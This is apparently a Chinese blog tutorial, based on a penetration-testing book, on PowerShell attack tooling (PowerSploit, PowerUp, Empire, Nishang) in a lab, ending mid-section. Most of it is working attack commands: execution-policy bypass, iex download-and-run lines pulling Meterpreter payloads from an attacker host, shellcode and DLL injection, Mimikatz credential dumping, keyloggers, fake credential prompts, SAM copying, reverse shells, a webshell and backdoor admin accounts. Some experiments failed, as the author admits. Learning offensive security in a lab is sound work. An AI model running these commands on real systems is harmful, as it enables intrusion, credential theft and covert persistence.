powershell攻击指南|电子爱好者-九游会真人第一品牌

admin管理员组

文章数量:1559118

文章目录

• 一：powershell简介
• • 1.1：基本概念
  • 1.2：执行策略与绕过
  • 1.3：常用命令
• 二：powersploit
• • 2.1：powersploit安装
  • 2.2：powersploit攻击实战
  • • 2.2.1：直接shellcode反弹meterpreter shell
    • 2.2.2：指定进程注入shellcode反弹meterpreter shell
    • 2.2.3：invoke-dllinjection
    • 2.2.4：invoke-portscan
    • 2.2.5：invoke-mimikatz
    • 2.2.6：get-keystrokes
  • 2.3：powerup攻击模块
  • • 2.3.1：模块讲解（20个）
    • 2.3.2：模块实战（未成功，待后续补充）
    • • 2.3.2.1：实战1
      • 2.3.2.2：实战2
• 三：empire（此章节实验未成功）
• • 3.1：简介
  • 3.2：安装
  • 补充：empire踩过的坑（问题未解决）
  • 3.3：设置监听
  • 3.4：生成木马
  • • 3.4.1：dll木马
    • 3.4.2：launcher
    • 3.4.3：launcher_var木马
    • 3.4.4：launcher_bat木马
    • 3.4.5：macro木马
    • 3.4.6：ducky
  • 3.5：连接主机及基本使用
  • 3.6：信息收集
  • 3.7：权限提升
  • 3.8：横向渗透
  • 3.9：后门
  • 3.10：empire反弹回metasploit
• 四：nishang
• • 4.1：简介
  • • 4.1.1：nishang的导入
    • 4.1.2：结构目录的了解
  • 4.2：nishang模块攻击实战
  • • 4.2.1：check-vm
    • 4.2.2：invoke-credentialsphish
    • 4.2.3：copy-vss
    • 4.2.4：firebuster firelistener扫描器
    • 4.2.5：keylogger键盘记录
    • 4.2.6：invoke-mimikatz
    • 4.2.7：get-passhashes
    • 4.2.8：获取用户的密码提示信息
  • 4.3：powershell隐藏通信隧道
  • • 4.3.1：基于tcp协议的powershell交互式shell
    • 4.3.2：基于udp协议的powershell交互式shell
  • 4.4：webshell后门
  • 4.5：权限提升
  • • 4.5.1：下载执行
    • 4.5.2：bypass uac
    • 4.5.3：删除补丁
    • 4.5.4：其他功能
    • • 1、端口扫描（invoke-portscan）
      • 2、爆破破解（invoke-bruteforce）
      • 3、嗅探
      • 4、屏幕窃取
      • 5、生成木马
      • 6、后门
• 五：总结

参考书籍：web安全攻防：渗透测试实战指南

 
 

一：powershell简介

1.1：基本概念

什么是powershell?

 

可以简单理解为cmd.exe的扩展。
powershell具有灵活性和功能化管理windows系统的能力，powershell脚本文件后缀名是.ps1(数字1)

windows powershell是一种命令行外壳程序和脚本环境，它内置在每个受支持的windows版本中，使命令行用户和脚本编写者可以利用.net framework的强大功能。一旦攻击者可以在一台计算机上运行代码，他们就会下载powershell脚本文件到磁盘中执行，甚至无需写入到磁盘，可以直接在内存中运行。

powershell需要环境支持，同时支持对象，其可读性，易用性位居所有shell之首。

特点：
1：windows7以上操作系统默认安装
2：powershell脚本可以运行在内存中，不需要写入磁盘
3：可以从另一个系统中下载powershell脚本并执行
4：目前很多工具都是基于powershell开发的
5：很多安全软件并不能检测到powershell的活动
6：cmd.exe通常会被阻止运行，但是powershell不会
7：可以用来管理活动目录

可以输入get-host查看powershell版本，也可以用$psversiontable.psversion

powershell脚本的运行和在linux下执行shell一样，.\test.ps1

 

1.2：执行策略与绕过

执行策略：
为防止恶意脚本的执行，powershell有一个执行策略，默认情况下，这个执行策略被设为受限。
在powershell脚本无法执行时，可以使用以下cmdlet命令（后一小节有说明）确定当前的执行策略。

可以使用下面的cmdlet设置powershell的执行策略

命令	说明
restricted	脚本不能运行（默认设置）
remotesigned	本地创建的脚本可以运行，但从网上下载的脚本不能运行（拥有数字证书签名的除外）
allsigned	仅当脚本由受信任的发布者签名时才能运行
unrestricted	允许所有的script运行

powershell执行策略的绕过
如果要运行powershell脚本程序，必须用管理员权限将restricted策略改成unrestricted，所以在渗透时就要采用一些方法绕过策略来执行脚本。
如下图：

1：绕过本地权限执行
powershell.exe -executionpolicy bypass -file xxx.ps1

2:：本地隐藏绕过权限执行
powershell.exe -exec bypass -windowstyle hidden -nologo -noninteractive -noprofile -file xxx.ps1
-executionpolicy bypass(-exec bypass)：绕过执行安全策略，默认情况下，powershell的安全策略规定powershell不能运行命令和文件，在渗透测试中，基本每一次都需要设置这个参数。
-windowstyle hidden(-w hidden)：隐藏窗口
-noninteractive(-noni)：非交互模式，powershell不为用户提供交互式的提示
-noprofile(-nop)：powershell控制台不加载当前用户的配置文件
-noexit：执行后不退出shell。这个参数在使用键盘记录等脚本时非常重要。
-nologo：启动不显示j9九游会老哥俱乐部交流区的版权标志的powershell

3：用iex下载远程ps1脚本绕过权限执行
powershell.exe -exec bypass -windowstyle hidden -noprofile -noni iex(new-objectnet.webclient).downloadstring("xxx.ps1");[parameters]
其中xxx.ps1为网络地址
 

1.3：常用命令

在powershell下，类似“cmd命令”叫做“cmdlet”，其命名规范相当一致，都采用“动词-名词”的形式。不区分大小写，一般兼容windows command和linux shell

这里是我在微软官方找到的new-item的文档说明，链接：点击

说明	命令
在当前目录中创建文件	new-item -path . -name "testfile1.txt" -itemtype "file" -value "this is a text string."
创建目录	new-item -path "c:\" -name "logfiles" -itemtype "directory"
在不同的目录中创建目录	new-item -itemtype "directory" -path "c:\ps-test\scripts"
创建多个文件	new-item -itemtype "file" -path "c:\ps-test\test.txt", "c:\ps-test\logs\test.log"
显示文本内容	get-content test.txt
设置文本内容（不存在test.txt则创建）	set-content test.txt -value "hello"
追加文本内容（换行追加）	add-content test.txt -value 'world"
清除文本内容（只是清除内容，会保留一个空文件）	clear-content test.txt

 

 

二：powersploit

powersploit是一款基于powershell的后渗透框架软件，包含很多powershell攻击脚本，主要用于渗透中的信息侦查，权限提升，权限维持。

2.1：powersploit安装

通过kali下载powersploit
git clone https://github/powershellmafia/powersploit
无法连接到github的读者，我这里给出了压缩包：点我下载(访问密码：bhl9ue)
下载解压之后，把整个文件夹放在kali的/var/www/html目录下即可，如下图：

然后kali开启apache服务 service apache2 start，再网页打开，如下图：

2.2：powersploit攻击实战

攻击机器：kali,ip:192.168.1.1
目标机器：win10,ip:192.168.10

powersploit下的各类攻击脚本很多，下面以codeexecution模块下的invoke-shellcode脚本为例。

 

2.2.1：直接shellcode反弹meterpreter shell

步骤：

1：msfconsole（启动msf）
2：use exploit/multi/handler
3：set payload windows/meterpreter/reverse_https（如果是64位的，路径：set payload windows/x64/meterpreter/reverse_https）
4：show options(查看选项，设置ip等信息)
5：exploit

使用msfvenom命令生成一个powershell脚本木马，
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.1 lport=8443 -f powershell -o /var/www/html/test

然后在目标机win10上面，用iex命令下载该脚本，再下载该木马，然后运行。

iex (new-object net.webclient).downloadstring("http://192.168.1.1/powersploit-master/codeexecution/invoke-shellcode.ps1")
iex (new-object net.webclient).downloadstring("http://192.168.1.1/test")
invoke-shellcode -shellcode ($buf) -force

$buf代表的是生成的木马的内容，后面还有很长的0x内容

然后返回到msf监听界面，发现已经成功反弹了。输入shell，即可进入目标主机管理员命令行

 

2.2.2：指定进程注入shellcode反弹meterpreter shell

同样步骤：

1：msfconsole（启动msf）
2：use exploit/multi/handler
3：set payload windows/meterpreter/reverse_https（如果是64位的，路径：set payload windows/x64/meterpreter/reverse_https）
4：show options(查看选项，设置ip等信息)
5：exploit

也同样在目标机powershell下先输入以下命令：

iex (new-object net.webclient).downloadstring("http://192.168.1.1/powersploit-master/codeexecution/invoke-shellcode.ps1")
iex (new-object net.webclient).downloadstring("http://192.168.1.1/test")

通过ps查看当前有哪些进程

然后创建一个隐藏的进程，比如创建一个隐藏的notepad.exe，再通过ps查看，发现多了个notepad.exe进程

start-process c:\windows\system32\notepad.exe -windowstyle hidden
ps

接着使用invoke-shellcode脚本进行进程注入。回到msf监听界面发现反弹成功。

invoke-shellcode -processid 2928 -shellcode($buf) -force

 

2.2.3：invoke-dllinjection

invoke-dllinjection是code execution模块下的另一个脚本，是一个dll注入的脚本
目标机：

iex (new-object net.webclient).downloadstring("http://192.168.1.1/powersploit-master/codeexecution/invoke-dllinjection.ps1")

kali：

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.1 lport=8443 -f dll -o /var/www/html/test.dll

把test.dll通过如下指令上传到目标服务器的c盘（c盘路径要正确，要不然报错 使用“2”个参数调用“downloadfile”时发生异常:“在 webclient 请求期间发生异常。”）

(new-object system.net.webclient).downloadfile("http://192.168.1.1/test.dll","c:\test.dll")

然后启动一个新的隐藏进程进行dll注入

ps c:\users\administrator> iex (new-object net.webclient).downloadstring("http://192.168.1.1/powersploit-master/codeexecution/invoke-dllinjection.ps1")
ps c:\users\administrator> start-process c:\windows\system32\notepad.exe -windowstyle hidden
ps c:\users\administrator> ps		通过ps查看进程号
ps c:\users\administrator> invoke-dllinjection -processid 912 -dll c:\test.dll		这个912是刚才新建的隐藏进程notepad.exe的进程号

 

2.2.4：invoke-portscan

这是recon模块下的一个脚本，主要用于端口扫描。很简单，两条指令。

iex (new-object net.webclient).downloadstring("http://192.168.1.1/powersploit-master/recon/invoke-portscan.ps1")
invoke-portscan -hosts 192.168.1.7,192.168.1.10 -ports "80,22,3389,23,445"

 

2.2.5：invoke-mimikatz

这是exfiltration模块下的一个脚本，和mimikatz工具一样，用于hash密码抓取

iex (new-object net.webclient).downloadstring("http://192.168.1.1/powersploit-master/exfiltration/invoke-mimikatz.ps1")
invoke-mimikatz -dumpcreds

 

2.2.6：get-keystrokes

这是exfiltration模块下的一个脚本，用于键盘记录，功能相当强大，不仅有键盘输入记录，甚至能记录鼠标的点击情况，还能记录详细的时间，实战时可以直接放入后台运行。

ps c:\users\administrator> iex (new-object net.webclient).downloadstring("http://192.168.1.1/powersploit-master/exfiltration/get-keystrokes.ps1")
ps c:\users\administrator> get-keystrokes -logpath c:\test.txt
ps c:\users\administrator> fafdsfdsfdsfdsdsdfasfssafas

 
 

2.3：powerup攻击模块

2.3.1：模块讲解（20个）

powerup是privesc模块下的一个脚本，功能相当强大，拥有众多用来寻找目标主机windows服务漏洞进行提权的实用脚本。

下载脚本到本机上，输入get-help [cmdlet] -full命令查看帮助，如下：

ps c:\users\administrator> iex (new-object net.webclient).downloadstring("http://192.168.1.1/powersploit-master/privesc/powerup.ps1")
ps c:\users\administrator> get-help invoke-allchecks -full

 
1：invoke-allchecks
该模块会自动执行powerup下所有的脚本来检查目标主机。

 

2：find-pathdllhijack
该模块用于检查当前%path%的哪些目录是用户可以写入的

 

3：get-applicationhost
该模块可利用系统上的applicationhost.config文件恢复加密过的应用池和虚拟目录的密码

ps c:\users\administrator> get-applicationhost
ps c:\users\administrator> get-applicationhost | format-table -autosize				# 列表显示

 

4：get-registryalwaysinstallelevated
该模块用于检查alwaysinstallelevated注册表项是否被设置，如果被设置，意味着msi文件是以system权限运行的。

get-registryalwaysinstallelevated

补充一下：
什么是msi文件？
msi文件是windows installer的数据包，它实际上是一个数据库，包含安装一种产品所需要的信息和在很多安装情形下安装（和卸载）程序所需的指令和数据。msi文件将程序的组成文件与功能关联起来。此外，它还包含有关安装过程本身的信息。如目标文件夹路径、系统依赖项、安装选项和控制安装过程的属性。

 

5：get-registryautologon
该模块用于检测winlogin注册表的autoadminlogon项有没有被设置，可查询默认的用户名和密码

 

6：get-servicedetail
该模块用于返回某服务的信息

 

7：get-servicefilepermission
该模块用于检查当前用户能够在哪些服务的目录写入相关联的可执行文件，我们可通过这些文件实现提权。

不知道为啥报错，下面是我在网页找到的截图.

 

8：test-servicedaclpermission
该模块用于检查所有可用的服务，并尝试对这些打开的服务进行修改，如果可修改，则返回该服务对象。

 

9：get-serviceunquoted
该模块用于检查服务路径，返回包含空格但是不带引号的服务路径。
此处利用了windows的一个逻辑漏洞，即当文件包含空格时，windows api 会被解释为两个路径，并将这两个文件同时执行，有是可能会造成权限的提升，比如c:\program files\hello.exe会被解释为c:\program.exe和c:\program files\hello.exe，然而报错了。。（23333）有大佬知道九游会真人第一品牌的解决方案吗？

下面这是我在书上拍的图片：

 

10：get-unattendedinstallfile
该模块用于检查以下路径，查找是否存在这些文件，因为这些文件里面可能包含部署凭据。

c:\sysprep\sysprep.xml
c:\sysprep\sysprep.inf
c:\windows\panther\unattended.xml
c:\windows\panther\unattend\unattended.xml
c:\windows\panther\unattend.xml
c:\windows\panther\unattend\unattend.xml
c:\windows\system32\sysprep\unattend.xml
c:\windows\system32\sysprep\panther\unattend.xml

 

11：get-modifiableregistryautorun
该模块用于检查开机自启的应用程序路径和注册表键值，然后返回当前用户可修改的程序路径。
被检查的注册表键值有以下这些：

hklm\software\microsoft\windows\currentversion\run
hklm\software\microsoft\windows\currentversion\runonce
hklm\software\microsoft\windows\currentversion\runservice
hklm\software\microsoft\windows\currentversion\runonceservice
hklm\software\wow6432node\microsoft\windows\currentversion\run
hklm\software\wow6432node\microsoft\windows\currentversion\runonce
hklm\software\wow6432node\microsoft\windows\currentversion\runservice
hklm\software\wow6432node\microsoft\windows\currentversion\runonceservice

 

12：get-modifiablescheduledtaskfile
该模块用于返回当前用户能够修改的计划任务程序的名称和路径，输入以下命令即可执行该模块。

 

13：get-webconfig
该模块用于返回当前服务器上web.config文件中的数据库连接字符串的明文，输入以下命令即可执行该模块

 

14：invoke-serviceabuse
该模块通过修改服务来添加用户到指定组，并可以通过设置-cmd参数触发添加用户的自定义命令。

ps c:\windows\system32> invoke-serviceabuse -servicename vulnsvc #添加默认账号
ps c:\windows\system32> invoke-serviceabuse -servicename vulnsvc -username "testlab\john" #指定添加的域账号
ps c:\windows\system32> invoke-serviceabuse -servicename vulnsvc -username backdoor -password password -localgroup "administrators" #指定添加用户，用户密码以及添加的用户组
ps c:\windows\system32> invoke-serviceabuse -servicename vulnsvc -command "net......" #自定义执行命令

 

15：restore-servicebinary
该模块用于恢复服务的可执行文件到原始目录，执行该模块的命令如下所示：

ps c:\> restore-servicebinary -servicename vulnsvc

 

16：test-servicedaclpermission
该模块用于检查某个用户是否在服务中有自由访问控制的权限，结果会返回true或false

 test-servicedaclpermission -servicename vulnsvc

 

17：write-hijackdll
该模块用于输出一个自定义命令并且能够自我删除的bat文件$env:temp\debug.bat，并输出一个能够启动这个bat文件的dll。

由2.2.3章节在c盘目录下已有一个test.dll文件了。这时候我们可以把test.dll复制一份，命名为test2.dll，如下图：

然后运行如下命令，就会在该目录下生成一个debug.bat的文件。

write-hijackdll -dllpath "c:\temp\test2.dll" -command "whoami"

双击运行bat即可，
 

18：write-useraddmsi
该模块用于生成一个安装文件，运行这个安装文件后会弹出添加用户的对话框，输入以下命令即可执行该模块

 

19：write-servicebinary
该模块用于预编译c#服务的可执行文件，默认创建一个管理员账号，可通过command定制自己的命令，执行该模块的命令如下所示。

ps c:\windows\system32> write-servicebinary -servicename vulnsvc #添加默认账号
ps c:\windows\system32> write-servicebinary -servicename vulnsvc -username "testlab\john" #指定添加的域账号
ps c:\windows\system32> write-servicebinary -servicename vulnsvc -username backdoor -password password123! -localgroup "administrators" #指定添加用户，用户密码以及添加的用户组
ps c:\windows\system32> write-servicebinary -servicename vulnsvc -command "net......" #自定义执行命令

 

20：install-servicebinary
该模块通过write-servicebinary写一个c#的服务用来添加用户，执行该模块的命令如下所示。

ps c:\windows\system32> install-servicebinary -servicename dhcp
ps c:\windows\system32> install-servicebinary -servicename vulnsvc -username "testlab\john"
ps c:\windows\system32> install-servicebinary -servicename vulnsvc -username backdoor -password password123! 
ps c:\windows\system32> install-servicebinary -servicename vulnsvc -command "net......"

 

2.3.2：模块实战（未成功，待后续补充）

2.3.2.1：实战1

这次实战用到invoke-allchecks、install-servicebinary、get-serviceunquoted、test-servicedaclpermission、restore-servicebinary这几个模块。

环境准备：
kali：192.168.152.130
win10：192.168.152.128

1：msfconsole（启动msf）
2：use exploit/multi/handler
3：set payload windows/meterpreter/reverse_https（如果是64位的，路径：set payload windows/x64/meterpreter/reverse_https）
4：show options(查看选项，设置ip等信息)
5：set lhost 192.168.152.130
6：exploit

再打开另一个cmd窗口，利用msfvenom生成木马
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.152.130 lport=8443 -f powershell -o /var/www/html/test

然后在目标机win10上面关闭win10的实时保护，用iex命令下载该脚本，再下载该木马，然后运行。

iex (new-object net.webclient).downloadstring("http://192.168.152.130/powersploit/codeexecution/invoke-shellcode.ps1")
iex (new-object net.webclient).downloadstring("http://192.168.152.130/test")
invoke-shellcode -shellcode ($buf) -force

返回到kali上，发现已开启监听了

 

在kali上先加载powerup脚本，然后执行invoke-allchecks，脚本将进行所有的检查。
将powerup脚本上传到目标服务器，再从本地执行该脚本。

getuid
upload /root/powersploit/privesc/powerup.ps1 c:\

使用iex在内存中加载此脚本，执行以下命令，脚本将进行所有的检查

 powershell.exe -exec bypass -c "iex (new-object net.webclient).downloadstring('c:\powerup.ps1'); invoke-allchecks"

这里我没有试验成功。出现如下画面（不知道为啥，我又试了win7,win2008均是powershell未响应）：
我这里给出了一篇网上关于这部分的文章链接：🔗点我

但是书本上有实战成功，如下截图。

按照书上的说明：powerup列出了所有可能存在问题的服务，并在abusefunction中直接给出了利用方式。

这里可以分为两部分：
第一部分通过get-serviceunquoted模块（利用windows的一个逻辑漏洞，即当文件包含空格时，windows api会解释为两个路径，并将这两个文件同时执行，有些时候可能会造成权限的提升）检测出“omniserv”，“omniserver”，“omniservers”，“vulnerable service”四个服务存在此逻辑漏洞，但都没有写入权限，所以并不能被利用与提权。

第二部分通过test- servicedaclpermission模块（检查所有可用的服务，并尝试对这些打开的服务进行修改，如果可以修改，则存在此漏洞）检测出当前用户可以在“omniservers”服务的目录写入相关联的可执行文件，并且通过这些文件进行提权。

漏洞利用原理：windows 系统服务文件在操作系统启动时会加载执行，并且在后台调用可执行文件。比如，java 升级程序，每次重启系统时，java 升级程序会检测 oracle 网站，是否有新版 java 程序。而类似 java 程序之类的系统服务程序加载时往往都是运行在系统权限上的。所以如果一个低权限的用户对于此类系统服务调用的可执行文件具有可写的权限，那么就可以将其替换成我们的恶意可执行文件，从而随着系统启动服务而获得系统权限。

 

2.3.2.2：实战2

这里用到了get-registryalwaysinstallelevated 和 write-useraddmsi 这两个模块，用前者模块来检查注册表项是否被设置，如果alwaysinstallelevated注册表项被设置，意味着msi文件是以system权限运行的。执行该模块的命令如下，true表示已经设置。

依旧没有成功，终究是太菜了 唉。。。各种报错。

接下来是书面的截图

 

 

三：empire（此章节实验未成功）

3.1：简介

empire是一款针对windows平台的，使用powershell脚本作为攻击载荷的渗透攻击框架工具，具有从stager生成，提权到渗透维持的一系列功能。empire实现了无需powershell.exe就可以运行powershell代理的功能，还可以快速在后期部署漏洞利用模块，其内置模块有键盘记录，mimikatz，绕过uac，内网扫描等，并且能够躲避网络检测和大部分安全防护工具的查杀，简单来说有点类似于metasploit，是一个基于powershell的远程控制木马。

 

3.2：安装

empire运行在linux平台，这里使用的系统是debian，首先使用git命令下载程序目录。
git clone https://github/empireproject/empire.git

接着进入setup目录，使用以下命令安装empire

cd empire
cd setup
./install.sh

吐槽一句：时长是真的感人啊…
接下来让你输入一个密码，

然后安装成功。

 
安装结束之后，在empire目录下输入./empire

安装成功。可以直接跳到3.3章节：设置监听

 

补充：empire踩过的坑（问题未解决）

安装结束之后，在empire目录下输入./empire，好家伙，直接报错少文件，

从报错信息来看这是一个python文件，vim打开如下，

既然缺少那就直接安装，pip install flask

依然报错，发现连pip都没有，那就只能先下载pip模块。apt install python3-pip

还报错！！！从最后一句可以看出，要我们尝试用apt-get update来试试，好的，那。。。试试就逝世~~

依旧报错，从图中红框通过谷歌翻译可以看出，以下签名无效。
九游会真人第一品牌的解决方案：

wget archive.kali/archive-key.asc
apt-key add archive-key.asc

然后：

apt-get update
apt install python3-pip

没啥问题，终于可以用pip命令了。

卧槽，你现在告诉我，这个包其实已经有了。。。日了狗了。。。啊啊啊啊啊啊啊啊啊~~

cd /usr/lib/python3/dist-packages]
cp -rf flask /tmp/empire 

然后文件复制过去之后，
cd /tmp/empire
./empire

又又又报错，vim打开vim /tmp/empire/flask/__init__.py，注释掉14行15行

发现不行，后续还会报其他错误，这里就不贴图了，反正人麻了。。。

找到另一个方法，指定安装路径

pip install --target=/tmp/empire flask

修改源：vim /etc/apt/sources.list

官方源
deb http://http.kali/kali kali-rolling main non-free contrib
deb-src http://http.kali/kali kali-rolling main non-free contrib
中科大源
deb http://mirrors.ustc.edu/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu/kali kali-rolling main non-free contrib
阿里云源
deb http://mirrors.aliyun/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun/kali kali-rolling main non-free contrib
清华大学源
deb http://mirrors.tuna.tsinghua.edu/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu/kali kali-rolling main contrib non-free
浙大源
deb http://mirrors.zju.edu/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu/kali kali-rolling main contrib non-free
东软大学源
deb http://mirrors.neusoft.edu/kali kali-rolling/main non-free contrib
deb-src http://mirrors.neusoft.edu/kali kali-rolling/main non-free contrib
新加坡kali源
deb http://mirror.nus.edu.sg/kali/kali/ kali main non-free contrib
deb-src http://mirror.nus.edu.sg/kali/kali/ kali main non-free contrib
163 kali源
deb http://mirrors.163/debian wheezy main non-free contrib
deb-src http://mirrors.163/debian wheezy main non-free contrib

换源安装flask成功

其实上面的安装方法都不是很对，empire是基于python2的，而我上面使用python3的环境，从而导致很多的py文件运行时报错，后来发现根本修改不过来，也尝试过用python2转python3的方法（如下）。

终端输入以下两条命令：
update-alternatives --install /usr/bin/python python /usr/bin/python2 100
update-alternatives --install /usr/bin/python python /usr/bin/python3 150
终端查询此时的版本，发现切换为python3.5.3（150比100优先级高）

依旧不行，反正各种报错吧。后来改用python2环境重新下载安装了empire，也是缺各种安装包，并且安装了也会提示你没有安装。看不懂，，，

所以就一直卡在这里了。

 

3.3：设置监听

 
此章节及后续章节所有图片均是书上拍照所得。。。安装不了没法实验，待后续补充吧。。唉
 
 

运行empire后，输入help命令查看具体的使用帮助。
empire的使用原理和metasploit的使用原理是一样的，都是先设置一个监听，再生成一个木马，然后在目标主机中运行该木马，我们的监听就会连接上反弹回来的代理。

输入listeners命令进入监听线程界面，接着输入uselistener来设置采用何种模式，可以看到有如下 7 种模式

我们这里采用http监听模式，输入uselistener http ，然后输入info命令查看具体参数设置

这里可以使用set命令设置相应参数，需要使用以下命令设置name、host、port

set name shuteer
set host xxx.xxx.xxx.xxx:xxxx(empire所在服务器的ip)

这里host默认的是我们vpn的ip，所以不做修改。修改完成后可以再次输入info查看设置是否正确，然后输入execute命令即可开始监听。

输入back命令即可返回上一层listeners界面，输入list命令可以列出当前激活的listener

使用kill命令就能删除该监听，如下图：

这里需要注意一点，当开启多个监听时，必须使用不同的名称，并且使用不同的端口，如果想要设置的端口已经被使用，那么在设置时会有提示信息。

 

3.4：生成木马

设置完监听，接着就要生成木马然后在目标机器上运行。可以把这个理解成metasploit里面的payload。
输入usestager来设置采用何种模块，其中multi为通用模块，osx是mac操作系统的模块，剩下的就是windows的模块。

3.4.1：dll木马

想要设置dll木马，首先输入usestager windows/dll的命令，然后输入info命令查看详细参数。

设置一下listener，然后执行execute命令，就会在tmp目录下生成名为launcher.dll的木马，launcher.dll在目标主机上运行后，就会成功上线。

set listener
execute

 

3.4.2：launcher

后续内容先跳过吧。有个链接可以参考下：https://blog.csdn/fageweiketang/article/details/88020020

3.4.3：launcher_var木马

3.4.4：launcher_bat木马

3.4.5：macro木马

3.4.6：ducky

3.5：连接主机及基本使用

3.6：信息收集

3.7：权限提升

3.8：横向渗透

3.9：后门

3.10：empire反弹回metasploit

 

 

四：nishang

4.1：简介

nishang是一款针对powershell的渗透工具。它基于powershell的渗透测试专用工具，集成了框架、脚本、和各种payload，包括了下载和执行、键盘记录、dns、延时命令等脚本。

下载地址：https://github/samratashok/nishang

4.1.1：nishang的导入

nishang要在powershell 3.0以上的环境中才可以正常使用，也就是说在windows7下默认是有点小问题的，可通过get-host查看版本。

先关掉win10的实时保护

 

get-host
cd e:\nishang-master\
import-module .\nishang.psm1

导入模块后可以查看nishang都有哪些模块，如下图

从上图中可以看到nishang的所有命令都被列出来了，get-information命令可以查看结果，后面还有很长的内容，忽略下图中的报错

我们可以在powershell中使用out-file将执行结果导出到文件中，
get-information | out-file res.txt

 

4.1.2：结构目录的了解

在实际渗透过程中，肯定不能把整个nishang的目录复制到服务器上，所以在远程下载一个脚本的时候，了解目录结构对寻找文件是很有帮助的。

如下图：

 

模块	功能
antak-webshell	webshell
backdoors	后门
client	客户端
escalation	提权
execution	远程代码执行（rce）
gather	信息收集
misc	杂项
pivot	跳板、远程执行exe
scan	扫描
powerpreter	meterpreter会话

 

4.2：nishang模块攻击实战

4.2.1：check-vm

该脚本用于检测当前的机器是否属于一台已知的虚拟机。它通过检测已知的一些虚拟机的指纹信息（如hyper-v、vmware、virtual pc、virtual box、xen、qemu）来识别。
这里书上和网上各种资源，并没有说这个东西具体在哪里，让我一顿好找

其实，check-vm.ps1从字面上看是检测一些虚拟机信息，那我估计在信息收集gather文件夹中，所以我们需要切换到当前路径下。红框中的内容是错误的（忽略掉），只需要输入check-vm即可

补充： 通过查看check-vm.ps1得到只需要输入check-vm即可

 

4.2.2：invoke-credentialsphish

这个脚本的作用是欺骗目标主机的用户，让用户输入密码，在实际使用中读者可以充分发挥想象力来灵活运用

该脚本的功能很强大，因为不输入正确的密码就关闭不了对话框，只能强制结束进程，这里就能得到明文的管理员账号密码。

这里我输入正确的账号密码之后，第一次卡住了，需要在命令行敲一下回车才可以显示出来，但是第二次就不需要了，可以直接显示出来。不知道是不是我这六七年前的电脑太卡了~~ 哈哈

 

4.2.3：copy-vss

这个脚本利用volume shadow copy复制sam文件，如果这个脚本运行在了dc机上，ntds.dit和system hive也能被拷贝出来。

直接在gather目录下运行copy-vss即可

也可以指定路径进行保存，前提是路径必须存在。

 

4.2.4：firebuster firelistener扫描器

用于对内网进行扫描，打开本地监听（端口），然后远程传送数据，把包发给firelistener。

firelistener 130-150
firebuster 192.168.152.132 130-150 -verbose

 

4.2.5：keylogger键盘记录

先看帮助文档，输入命令get-help .\keylogger.ps1 -full

分别的意思是：

1、使用这种方式运行，键盘记录会被保存在当前用户temp目录下（c:\users\outcast\appdata\local\temp）的key文件中。
2、-checkurl参数会检查所给出的网页之中是否包含 -magicstring后的字符串，如果存在就停止使用记录
3、将记录指定发送给一个可以记录post请求的web服务器。
4、实现持久化记录（重启后依然进行记录）

下面说说第一种方法，使用parse_keys来解析，parsed.txt里面就会出现解析后的按键记录

然后把key.log拷贝到gather目录中，parse_keys .\key.log .\parsed.txt

 

4.2.6：invoke-mimikatz

利用mimikatz抓取密码

invoke-mimikatz -dumpcerts		# dump出本机的凭证信息
invoke-mimikatz -dumpcreds -computername @("computer1", "computer2")		# dump出远程的两台计算机的凭证信息
invoke-mimikatz -command "privilege::debug exit" -computername "computer1"		# 在远程的一台机器上运行mimikatz并执行"privilege::debug exit"

 

4.2.7：get-passhashes

这个脚本在administrator的权限下可以dump出密码哈希值，来源于metasploit中的power dump模块，但在其基础上做出了修改，使得不再需要system权限就可以dump了

 

4.2.8：获取用户的密码提示信息

这个脚本可以从windows获取用户密码的提示信息，需要有administrator的权限来读取sam hive。可以根据提示生成密码字典，能大大提高爆破的成功率。甚至有一些人会将明文密码记录在这个提示信息中。

get-passhints

 

4.3：powershell隐藏通信隧道

4.3.1：基于tcp协议的powershell交互式shell

invoke-powershelltcp是基于tcp协议的powershell正向连接或反向连接shell，该模块的具体参数介绍如下所示。

ipaddress		# 选择-reverse选项时表示需要连接的ip地址
port(int32)				# 选择-reverse选项时表示需要连接的端口，选择-bind选项时表示需要监听的端口
reverse []				# 反向连接 
bind []				# 正向连接

1、反向连接

使用nc监听本地端口3333

在目标机器win10(192.168.1.10)上，invoke-powershelltcp -reverse -ipaddress 192.168.1.1 -port 3333

kali显示连接成功。

 
2、正向连接
在目标机win10(192.168.152.132)powershell下执行以下脚本命令，监听3333端口。
invoke-powershelltcp -bind -port 3333

在kali上，nc -nv 192.168.152.132 3333

 
那么何时选用反向连接，何时选用正向连接呢？
目标在内网，你在外网，反向连接
目标在外网，你在内网，正向连接

 

4.3.2：基于udp协议的powershell交互式shell

invoke-powershelludp是基于udp协议的powershell正向连接或反向连接shell
这里使用方法和tcp相同，由于基于udp协议，所以nc的命令有所不同。

正向连接命令：nc -nvu ip port
反向连接命令：nc -lup port

书上有个网址推荐，https://www.explainshell/ 这个网址 读者可以使用它查看包括windows和linux在内的各种命令解析。个人吐槽不如百度，哈哈，英文解释英文看不懂呀

 

4.4：webshell后门

该模块存放于\nishang\antak-webshell目录下，就是一个aspx的“大马”，使用powershell的命令，比cmd命令要强大很多，读者可以使用这个webshell编码执行脚本，上传、下载文件。
需要搭载iis，用网页的形式打开。

 

4.5：权限提升

4.5.1：下载执行

download_execute是nishang中的下载执行脚本，常用于下载文本文件，然后将其转换为可执行文件执行。
使用以下命令可利用nishang中的exetotext.ps1脚本将metasploit生成的木马shell.exe更改为文本文件shell.txt

kali ip:192.168.152.130

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.152.130 lport=5555 -f exe > shell.exe

然后把这个shell.exe（我这里在当前用户/root目录下，在哪运行就是在哪个目录下）复制到目标机器上，我的这里用真实机来模拟（虚拟机win10不知道咋回事，命令执行不报错，但是就是生成不了文件）

exetotext e:\shell.exe e:\shell.txt

回到kali上，进入msfconsole，启动监听

然后回来win10上，把生成的shell.txt文件，放到kali机器上，路径为：/var/www/html

然后kali开启apache服务，指令为：service apache2 start
然后回到win10（如下图，注意路径的变化），download_execute http://192.168.152.130/shell.txt

kali机明显监听成功，但是会话关闭。

网上搜索，说是payload不符合导致，

